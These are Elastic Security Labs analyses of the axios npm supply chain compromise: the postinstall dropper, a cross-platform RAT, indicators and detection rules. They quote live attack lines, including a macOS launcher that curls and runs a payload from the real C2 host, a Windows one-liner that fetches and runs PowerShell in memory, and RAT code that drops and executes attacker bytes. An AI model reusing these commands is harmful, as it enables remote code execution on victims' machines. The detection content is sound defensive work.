<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image3.png" alt="GitHub Security Advisory filed to the axios repository" title="GitHub Security Advisory filed to the axios repository" /></p>
<p>As the community flagged the compromise on social media, Elastic Security Labs shared early findings publicly to help defenders respond in real time.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image2.png" alt="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" title="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" /></p>
<p>This post covers the full attack chain: from the npm-level supply chain compromise through the obfuscated dropper, to the architecture of the cross-platform RAT and the meaningful differences between its three variants.</p>
<h2>Campaign overview</h2>
<p>The compromise is evident from the npm registry metadata. The maintainer email changed from <code>jasonsaayman@gmail[.]com</code> — present on all prior legitimate releases — to <code>ifstap@proton[.]me</code> on the malicious versions. The publishing method also changed:</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Published By</th>
<th>Method</th>
<th>Provenance</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios@1.14.0</code> (legitimate)</td>
<td><code>jasonsaayman@gmail[.]com</code></td>
<td>GitHub Actions OIDC</td>
<td>SLSA provenance attestations</td>
</tr>
<tr>
<td><code>axios@1.14.1</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
<tr>
<td><code>axios@0.30.4</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
</tbody>
</table>
<p>The shift from a trusted OIDC publisher flow with SLSA provenance to a direct CLI publish with a changed email is a clear indicator of unauthorized access.</p>
<h3>Timeline</h3>
<ul>
<li><strong>2026-02-18 17:19 UTC</strong> — <code>axios@0.30.3</code> published legitimately by <code>jasonsaayman@gmail[.]com</code></li>
<li><strong>2026-03-27 19:01 UTC</strong> — <code>axios@1.14.0</code> published legitimately via GitHub Actions OIDC</li>
<li><strong>2026-03-30 05:57 UTC</strong> — <code>plain-crypto-js@4.2.0</code> published by <code>nrwise</code> (<code>nrwise@proton.me</code>) — clean decoy to build registry history</li>
<li><strong>2026-03-30 23:59 UTC</strong> — <code>plain-crypto-js@4.2.1</code> published by <code>nrwise</code> — malicious version with <code>postinstall</code> backdoor</li>
<li><strong>2026-03-31 00:21 UTC</strong> — <code>axios@1.14.1</code> published by compromised account — tagged <code>latest</code></li>
<li><strong>2026-03-31 01:00 UTC</strong> — <code>axios@0.30.4</code> published by compromised account — tagged <code>legacy</code></li>
</ul>
<h3>Affected packages</h3>
<ul>
<li><strong><code>axios@1.14.1</code> — Malicious, tagged <code>latest</code> at time of discovery</strong></li>
<li><strong><code>axios@0.30.4</code> — Malicious, tagged <code>legacy</code> at time of discovery</strong></li>
<li><strong><code>plain-crypto-js@4.2.0</code> — Clean decoy, published to build registry history</strong></li>
<li><strong><code>plain-crypto-js@4.2.1</code> — Malicious, payload delivery vehicle (<code>postinstall</code> backdoor)</strong></li>
</ul>
<p><strong>Safe versions:</strong> <code>axios@1.14.0</code> (last legitimate 1.x release with SLSA provenance) and <code>axios@0.30.3</code> (last legitimate <code>0.30.x</code> release).</p>
<p>The attacker tagged both the latest and legacy channels, maximizing the blast radius across projects using either the current or legacy axios API.</p>
<h2>Code analysis</h2>
<h3>Stage 1: The plain-crypto-js dropper</h3>
<p>The entire delivery chain hinges on npm's postinstall lifecycle hook. Installing either compromised axios version pulls <code>plain-crypto-js@^4.2.1</code> as a dependency, which declares:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This causes setup.js to execute automatically during npm install — no user interaction required.</p>
<p>The setup.js file uses a two-layer encoding scheme to conceal its behavior:</p>
<ul>
<li><strong>Layer 1:</strong> String reversal followed by Base64 decoding</li>
<li><strong>Layer 2:</strong> XOR cipher using the key OrDeR_7077 with a position-dependent index (7 * i² % 10)</li>
</ul>
<p>All critical strings, module names, URLs, shell commands are stored in an encoded array stq[] and decoded at runtime. The decoded contents reveal the operational infrastructure:</p>
<h3>Platform-specific delivery</h3>
<p>After decoding its string table, the dropper checks os.platform() and branches into one of three delivery routines. Each sends an HTTP POST to <a href="http://sfrclak%5B.%5Dcom:8000/6202033">http://sfrclak[.]com:8000/6202033</a> with a platform-specific body — packages.npm.org/product0 (macOS), packages.npm.org/product1 (Windows), packages.npm.org/product2 (Linux) — allowing the C2 to serve the correct payload from a single endpoint. The packages.npm.org/ prefix is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Delivery Method</th>
<th>Stage-2 Location</th>
<th>Disguise</th>
</tr>
</thead>
<tbody>
<tr>
<td>macOS</td>
<td>AppleScript via osascript downloads binary with curl</td>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Apple system daemon</td>
</tr>
<tr>
<td>Windows</td>
<td>VBScript downloads .ps1 via curl, executes via renamed PowerShell (<code>%PROGRAMDATA%\wt.exe</code>)</td>
<td><code>%TEMP%\6202033.ps1</code> (transient)</td>
<td>Windows Terminal</td>
</tr>
<tr>
<td>Linux</td>
<td>Direct curl download and python3 execution</td>
<td><code>/tmp/ld.py</code></td>
<td>None</td>
</tr>
</tbody>
</table>
<h3>Anti-forensics</h3>
<p>The dropper performs two cleanup actions:</p>
<ol>
<li><strong>Self-deletion:</strong> setup.js removes itself via fs.unlink(__filename)</li>
<li><strong>Package manifest swap:</strong> A clean file named package.md (containing a benign version 4.2.0 configuration with no postinstall hook) is renamed to package.json, overwriting the malicious version</li>
</ol>
<p>Post-incident inspection of node_modules/plain-crypto-js/package.json reveals no trace of the postinstall trigger. The malicious setup.js is gone. Only the lockfile and npm audit logs retain evidence.</p>
<h3>Stage 2: Cross-platform RAT</h3>
<p>The three stage-2 payloads: PowerShell for Windows, compiled C++ for macOS, Python for Linux  are not three different tools. They are three implementations of the <strong>same RAT specification</strong>, sharing an identical C2 protocol, command set, message format, and operational behavior. The consistency strongly indicates a single developer or tightly coordinated team working from a shared design document.</p>
<h4>Shared architecture</h4>
<p>The following properties are <strong>identical across all three variants:</strong></p>
<ul>
<li><strong>C2 transport: HTTP POST</strong></li>
<li><strong>Body encoding: Base64-encoded JSON</strong></li>
<li><strong>User-Agent: <code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></strong></li>
<li><strong>Beacon interval: 60 seconds</strong></li>
<li><strong>Session UID: 16-character random alphanumeric string, generated per-execution</strong></li>
<li><strong>Outbound message types: <code>FirstInfo</code>, <code>BaseInfo</code>, <code>CmdResult</code></strong></li>
<li><strong>Inbound command types: <code>kill</code>, <code>peinject</code>, <code>runscript</code>, <code>rundir</code></strong></li>
<li><strong>Response command types: <code>rsp_kill</code>, <code>rsp_peinject</code>, <code>rsp_runscript</code>, <code>rsp_rundir</code></strong></li>
</ul>
<p>The spoofed IE8/Windows XP user-agent string is particularly notable, it is anachronistic on all three platforms, and its presence on a macOS or Linux host is a strong detection indicator.</p>
<h4>Initialization and reconnaissance</h4>
<p>On startup, each variant:</p>
<ol>
<li><strong>Generates a session UID</strong> — 16 random alphanumeric characters, included in every subsequent C2 message</li>
<li><strong>Detects OS and architecture</strong> — reports platform-specific identifiers (e.g., windows_x64, macOS, linux_x64)</li>
<li><strong>Enumerates initial directories</strong> of interest (user profile, documents, desktop, config directories)</li>
<li><strong>Sends a FirstInfo beacon</strong> containing the UID, OS identifier, and directory snapshot</li>
</ol>
<p>After initialization, the implant enters the main loop. The first BaseInfo heartbeat includes a comprehensive system profile. The same categories of data are collected on all platforms, though the underlying APIs differ:</p>
<table>
<thead>
<tr>
<th>Data Collected</th>
<th>Windows Source</th>
<th>macOS Source</th>
<th>Linux Source</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hostname</td>
<td>%COMPUTERNAME% env var</td>
<td>gethostname()</td>
<td>/proc/sys/kernel/hostname</td>
</tr>
<tr>
<td>Username</td>
<td>%USERNAME% env var</td>
<td>getuid() + getpwuid()</td>
<td>os.getlogin()</td>
</tr>
<tr>
<td>OS version</td>
<td>WMI / registry</td>
<td>sysctlbyname(&quot;kern.osproductversion&quot;)</td>
<td>platform.system() + platform.release()</td>
</tr>
<tr>
<td>Timezone</td>
<td>System timezone</td>
<td>localtime_r()</td>
<td>datetime.timezone</td>
</tr>
<tr>
<td>Boot time</td>
<td>System uptime</td>
<td>sysctl(&quot;kern.boottime&quot;)</td>
<td>/proc/uptime</td>
</tr>
<tr>
<td>Install date</td>
<td>Registry / WMI</td>
<td>stat(&quot;/&quot;) or sysctl</td>
<td>ctime of /var/log/installer or /var/log/dpkg.log</td>
</tr>
<tr>
<td>Hardware model</td>
<td>WMI</td>
<td>sysctlbyname(&quot;hw.model&quot;)</td>
<td>/sys/class/dmi/id/product_name</td>
</tr>
<tr>
<td>CPU type</td>
<td>WMI</td>
<td>sysctlbyname()</td>
<td>platform.machine()</td>
</tr>
<tr>
<td>Process list</td>
<td>Full PID, session, name, path</td>
<td>popen(&quot;ps&quot;) (up to 1000)</td>
<td>Full /proc enumeration (PID, PPID, user, cmdline)</td>
</tr>
</tbody>
</table>
<p>Subsequent heartbeats are lightweight, containing only a timestamp to confirm the implant is alive.</p>
<h4>Command dispatch</h4>
<p>The C2 response is parsed as JSON, and the type field determines the action. All three variants implement the same four commands:</p>
<p><strong>kill — Self-termination.</strong> Sends an rsp_kill acknowledgment and exits. The Windows variant's persistence mechanism (registry key + batch file) survives the kill command unless explicitly cleaned up; the macOS and Linux variants have no persistence of their own.</p>
<p><strong>runscript — Script/command execution.</strong> The operator's primary interaction command. Accepts a Script field (code to execute) and a Param field (arguments). When Script is empty, Param is run directly as a command. The execution mechanism is platform-native:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Execution Mechanism</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>PowerShell with -NoProfile -ep Bypass</td>
</tr>
<tr>
<td>macOS</td>
<td>AppleScript via /usr/bin/osascript</td>
</tr>
<tr>
<td>Linux</td>
<td>Shell via subprocess.run(shell=True) or Python via python3 -c</td>
</tr>
</tbody>
</table>
<p><strong>peinject — Binary payload delivery.</strong> Despite the Windows-centric naming (&quot;PE inject&quot;), all three platforms implement this as a way to drop and execute binary payloads:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Implementation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Windows</td>
<td>Reflective .NET assembly loading via [System.Reflection.Assembly]::Load()</td>
</tr>
<tr>
<td>macOS</td>
<td>Base64-decodes and drops a binary, executes with operator-supplied parameters.</td>
</tr>
<tr>
<td>Linux</td>
<td>Base64-decodes a binary to /tmp/.&lt;random 6-char string&gt; (hidden file), launches via subprocess.Popen().</td>
</tr>
</tbody>
</table>
<p>The Windows implementation has in-memory execution with no file drop but without disabling AMSI which will certainly flag on the Assembly load. The macOS and Linux variants take the simpler approach of writing a binary to disk and executing it directly.</p>
<p><strong>rundir — Directory enumeration.</strong> Accepts paths and returns detailed file listings (name, size, type, creation/modification timestamps, child count for directories). Allows the operator to interactively browse the filesystem.</p>
<h4>Capability summary</h4>
<table>
<thead>
<tr>
<th>Capability</th>
<th>Windows (PowerShell)</th>
<th>macOS (C++)</th>
<th>Linux (Python)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Persistence</td>
<td>Registry Run key + hidden .bat</td>
<td>None</td>
<td>None</td>
</tr>
<tr>
<td>Script execution</td>
<td>PowerShell</td>
<td>AppleScript via osascript</td>
<td>Shell or Python inline</td>
</tr>
<tr>
<td>Binary injection</td>
<td>Reflective .NET load injecting into cmd.exe</td>
<td>Binary drop + execute</td>
<td>Binary drop to /tmp/ + execute</td>
</tr>
<tr>
<td>Anti-forensics</td>
<td>Hidden windows, temp file cleanup</td>
<td>Hidden temp .scpt</td>
<td>Hidden /tmp/.XXXXXX files</td>
</tr>
</tbody>
</table>
<h2>Attribution</h2>
<p>The macOS Mach-O binary delivered by the <code>plain-crypto-js</code> postinstall hook exhibits significant overlap with <strong>WAVESHAPER</strong>, a C++ backdoor tracked by Mandiant and attributed to <strong>UNC1069</strong>, a DPRK-linked threat cluster.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image1.png" alt="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" title="Side-by-side comparison of the axios compromise macOS sample and WAVESHAPER indicators" /></p>
<h2>Conclusion</h2>
<p>This campaign demonstrates the continued attractiveness of the npm ecosystem as a supply chain attack vector. By compromising a single maintainer account on one of the JavaScript ecosystem's most depended-upon packages, the attacker gained a delivery mechanism with potential reach into millions of environments.</p>
<p>The toolkit's most reliable detection indicator is also its most curious design choice: the IE8/Windows XP user-agent string hardcoded identically across all three platform variants. While it provides a consistent protocol fingerprint for C2 server-side routing, it is trivially detectable on any modern network — and is an immediate anomaly on macOS and Linux hosts.</p>
<p>Elastic Security Labs will continue monitoring this activity cluster and will update this post with any additional findings.</p>
<h2>MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0001/">Initial Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1195/001/">Supply Chain Compromise: Compromise Software Dependencies</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/007/">Command and Scripting Interpreter: JavaScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/001/">Command and Scripting Interpreter: PowerShell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/002/">Command and Scripting Interpreter: AppleScript</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/004/">Command and Scripting Interpreter: Unix Shell</a></li>
<li><a href="https://attack.mitre.org/techniques/T1059/006/">Command and Scripting Interpreter: Python</a></li>
<li><a href="https://attack.mitre.org/techniques/T1547/001/">Boot or Logon Autostart Execution: Registry Run Keys</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/">Masquerading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1564/001/">Hidden Files and Directories</a></li>
<li><a href="https://attack.mitre.org/techniques/T1055/">Process Injection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1070/004/">Indicator Removal: File Deletion</a></li>
<li><a href="https://attack.mitre.org/techniques/T1082/">System Information Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1057/">Process Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1083/">File and Directory Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1071/001/">Application Layer Protocol: Web Protocols</a></li>
<li><a href="https://attack.mitre.org/techniques/T1571/">Non-Standard Port</a></li>
<li><a href="https://attack.mitre.org/techniques/T1132/001/">Data Encoding: Standard Encoding</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
</ul>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>6202033.ps1</code></td>
<td align="left">Windows payload</td>
</tr>
<tr>
<td align="left"><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>com.apple.act.mond</code></td>
<td align="left">MacOS payload</td>
</tr>
<tr>
<td align="left"><code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</code></td>
<td align="left">SHA-256</td>
<td align="left"><code>ld.py</code></td>
<td align="left">Linux payload</td>
</tr>
<tr>
<td align="left"><code>sfrclak[.]com</code></td>
<td align="left">DOMAIN</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
<tr>
<td align="left"><code>142.11.206[.]73</code></td>
<td align="left">ipv4-addr</td>
<td align="left"></td>
<td align="left">C2</td>
</tr>
</tbody>
</table>
<h2>References</h2>
<p>The following were referenced throughout the above research:</p>
<ul>
<li><a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/axios-one-rat-to-rule-them-all.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases detections for the Axios supply chain compromise]]></title>
            <link>https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections</link>
            <guid>axios-supply-chain-compromise-detections</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Hunting and detection rules for the Elastic-discovered Axios supply chain compromise.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs is releasing an initial triage and detection rules for the Axios supply-chain compromise. We have <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">released a detailed analysis</a> on the Axios compromise RAT and payloads.</p>
</blockquote>
<blockquote>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on March 31, 2026 at 01:50 AM UTC to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
</blockquote>
<h2>Introduction</h2>
<p>We are currently tracking a supply chain attack involving malicious Axios package versions that introduce a secondary dependency used for post-install execution. Rather than embedding malicious logic directly into the primary package, the attacker leveraged a transitive dependency to trigger execution during installation and deploy a cross-platform payload.</p>
<p>Elastic observed consistent execution patterns across impacted systems immediately after <code>npm install</code> of the malicious Axios versions (<code>1.14.1</code>, <code>0.30.4</code>). The added dependency (<code>plain-crypto-js@4.2.1</code>) executed during <code>postinstall</code> and was quickly followed by a second-stage payload.</p>
<p>Across Linux, Windows, and macOS, the activity followed the same structure:</p>
<pre><code>node (npm install)
  → OS-native execution (sh / cscript / osascript)
    → remote payload retrieval
      → backgrounded or hidden execution of stage 2
</code></pre>
<p>This results in a small but high-signal window where:</p>
<ul>
<li><code>node</code> spawns a shell or interpreter</li>
<li>a remote payload is fetched</li>
<li>execution is detached from the original process</li>
</ul>
<p>Elastic detections triggered reliably on this behavior across platforms, providing strong coverage of the delivery stage.</p>
<h2>How Elastic Detects the Supply Chain Attack</h2>
<p>This activity consistently appears in process telemetry as a Node.js process spawning an OS-native execution path to retrieve and execute a remote payload, often in a detached or hidden context. Elastic detections focus on this behavior rather than static indicators, providing reliable coverage of the delivery stage across platforms.</p>
<h3>Linux</h3>
<p>The Linux execution path is the cleanest place to start, because the malware does very little to hide what it is doing. We observed that the delivery stage produced exactly the kind of process ancestry you would expect from a compromised dependency:</p>
<pre><code>node → /bin/sh -c curl -o /tmp/ld.py ... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;
</code></pre>
<p>Which shows up as follows:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image6.png" alt="Elastic alerts triggering on backdoor execution" /></p>
<p>The initial signal comes from the Node.js process, handing off execution to a shell that performs a remote fetch. This is captured by the <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a> detection rule.</p>
<pre><code>event.category:process and
process.parent.name:(&quot;node&quot; or &quot;bun&quot; or &quot;node.exe&quot; or &quot;bun.exe&quot;) and 
(
  (
    process.name:(
      &quot;bash&quot; or &quot;dash&quot; or &quot;sh&quot; or &quot;tcsh&quot; or &quot;csh&quot; or  &quot;zsh&quot; or &quot;ksh&quot; or
      &quot;fish&quot; or &quot;cmd.exe&quot; or &quot;bash.exe&quot; or &quot;powershell.exe&quot;
    ) and
    process.command_line:(*curl*http* or *wget*http*)
  ) or 
  process.name:(&quot;curl&quot; or &quot;wget&quot; or &quot;curl.exe&quot; or &quot;wget.exe&quot;)
)
</code></pre>
<p>This captures the moment when the installation flow deviates from normal package behavior and begins pulling a payload over HTTP. In this case, it is the <code>curl</code> invocation that retrieves <code>/tmp/ld.py</code> from the remote server.</p>
<p>Shortly after, execution continues in the same shell, but now the focus shifts from retrieval to execution. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a>.</p>
<pre><code>event.category:process and event.type:start and
process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and
process.args:(-c and *&amp;)
</code></pre>
<p>Which captures the second half of the chain:</p>
<pre><code>sh -c &quot;... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;&quot;
</code></pre>
<p>The payload is launched with <code>nohup</code> and backgrounded immediately using <code>&amp;</code>, detaching it from the parent process and suppressing output. That transition from a short-lived install-time shell into a detached long-running process is where the actual implant takes over.</p>
<p>After execution, the Linux second stage is a Python-based RAT that establishes a simple polling loop to its C2. The entrypoint <code>work()</code> sends an initial <code>FirstInfo</code> message and then transitions into <code>main_work()</code>, which continuously reports host data and processes tasking:</p>
<pre><code class="language-py">while True:
    ps = print_process_list()

    data = {
        &quot;hostname&quot;: get_host_name(),
        &quot;username&quot;: get_user_name(),
        &quot;os&quot;: os,
        &quot;processList&quot;: ps
    }

    response_content = send_result(url, body)

    if response_content:
        process_request(url, uid, response_content)

    time.sleep(60)
</code></pre>
<p>On first check-in, it performs a targeted directory enumeration via <code>init_dir_info()</code> across user paths such as <code>$HOME</code>, <code>.config</code>, <code>Documents</code>, and <code>Desktop</code>, and builds a process listing directly from <code>/proc</code>, including usernames and start times.</p>
<p>Tasking is minimal but flexible. <code>runscript</code> supports arbitrary shell execution or base64-delivered Python via <code>python3 -c</code>, while <code>peinject</code> simply writes attacker-supplied bytes to a hidden file in <code>/tmp</code> and executes it:</p>
<pre><code class="language-py">file_path = f&quot;/tmp/.{generate_random_string(6)}&quot;
with open(file_path, &quot;wb&quot;) as file:
    file.write(payload)

os.chmod(file_path, 0o777)
subprocess.Popen([file_path] + shlex.split(param.decode(&quot;utf-8&quot;)))
</code></pre>
<p>This provides the operator with a lightweight access implant for periodic host profiling, command execution, and follow-on payload delivery.</p>
<p>Together, these detections provide strong coverage of the Linux delivery stage and the transition into the Python backdoor, without relying on specific filenames or hardcoded indicators:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></li>
</ul>
<h3>Windows</h3>
<p>The Windows execution path follows the same pattern: it uses curl to download a remote PowerShell script and proxy execution via a renamed PowerShell (<code>C:\ProgramData\wt.exe</code>). The following alert shows the process chain:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image5.png" alt="Elastic - Alert Process Tree" title="Elastic - Alert Process Tree" /></p>
<p>Where:</p>
<ul>
<li><code>wt.exe</code> is a renamed copy of <code>PowerShell.exe</code> located in <code>C:\ProgramData\wt.exe</code></li>
<li><code>curl</code> is used to retrieve a remote PowerShell script</li>
<li>execution is performed via the renamed binary</li>
</ul>
<p>We first observe the creation and use of the renamed interpreter. This is captured by <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a>, which flags signed system binaries executed from unexpected locations.</p>
<p>Shortly after, the same binary is used to retrieve the second-stage payload over HTTP. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a>, capturing the network retrieval stage driven from the scripted execution chain.</p>
<p>The second stage is a PowerShell-based RAT that beacons to its C2 (<code>http[:]//sfrclak[.]com:8000/</code>) every 60 seconds over HTTP using a fake IE8 User-Agent and base64-encoded JSON.</p>
<p>It establishes persistence via <code>Run\MicrosoftUpdate</code> registry key to execute a hidden bat script <code>C:\ProgramData\system.bat:</code></p>
<p>The batch file dynamically retrieves and executes the payload in memory on login:</p>
<pre><code>
start /min powershell -w h -c &quot;
([scriptblock]::Create(
  [System.Text.Encoding]::UTF8.GetString(
    (Invoke-WebRequest -UseBasicParsing -Uri '' -Method POST -Body 'packages.npm.org/product1').Content
  )
)) ''&quot;
</code></pre>
<p>Its core capabilities include:</p>
<ul>
<li><strong>peinject</strong> - in-memory .NET assembly injection using Assembly.Load(byte[]) for process hollowing into cmd.exe.</li>
<li><strong>runscript</strong> - arbitrary PowerShell script execution via encoded commands or temp files,</li>
<li><strong>rundir</strong> - filesystem enumeration of user directories and all drive roots.</li>
</ul>
<p>On initialization, it fingerprints the host via WMI, collecting hostname, username, OS version, CPU, hardware model, timezone, boot/install times, and a full process listing, and sends an initial directory listing of Documents, Desktop, OneDrive, and AppData before entering its beacon loop.</p>
<p>The second stage triggers both the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a> alerts:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image2.png" alt="" /></p>
<p>The <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a> rule alert captures the PowerShell RAT script content :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image1.png" alt="" /></p>
<p>Taken together, these detections capture the full Windows delivery chain: from renamed binary execution, to payload retrieval, to persistence, and in-memory execution via the following behavioral detections:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></li>
</ul>
<h3>macOS</h3>
<p>Analysis shows the loader writes AppleScript to a temp file, runs it via <code>osascript</code>, then downloads the second stage to a fake Apple-looking cache path and launches it through <code>/bin/zsh</code>. The key launcher looks like this:</p>
<pre><code>do shell script &quot;curl -o /Library/Caches/com.apple.act.mond \
 -d packages.npm.org/product0 \
 -s http://sfrclak.com:8000/6202033 \
 &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
 &amp;&amp; /bin/zsh -c \&quot;/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;\&quot; \ &amp;&gt; /dev/null&quot;
</code></pre>
<p>The delivered file produced the following execution matching on the file name masquerading attempt and the self-signed code signature :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image3.png" alt="Elastic Defend behavior alert triggering on the macOS backdoor" title="Elastic Defend behavior alert triggering on the macOS backdoor" /></p>
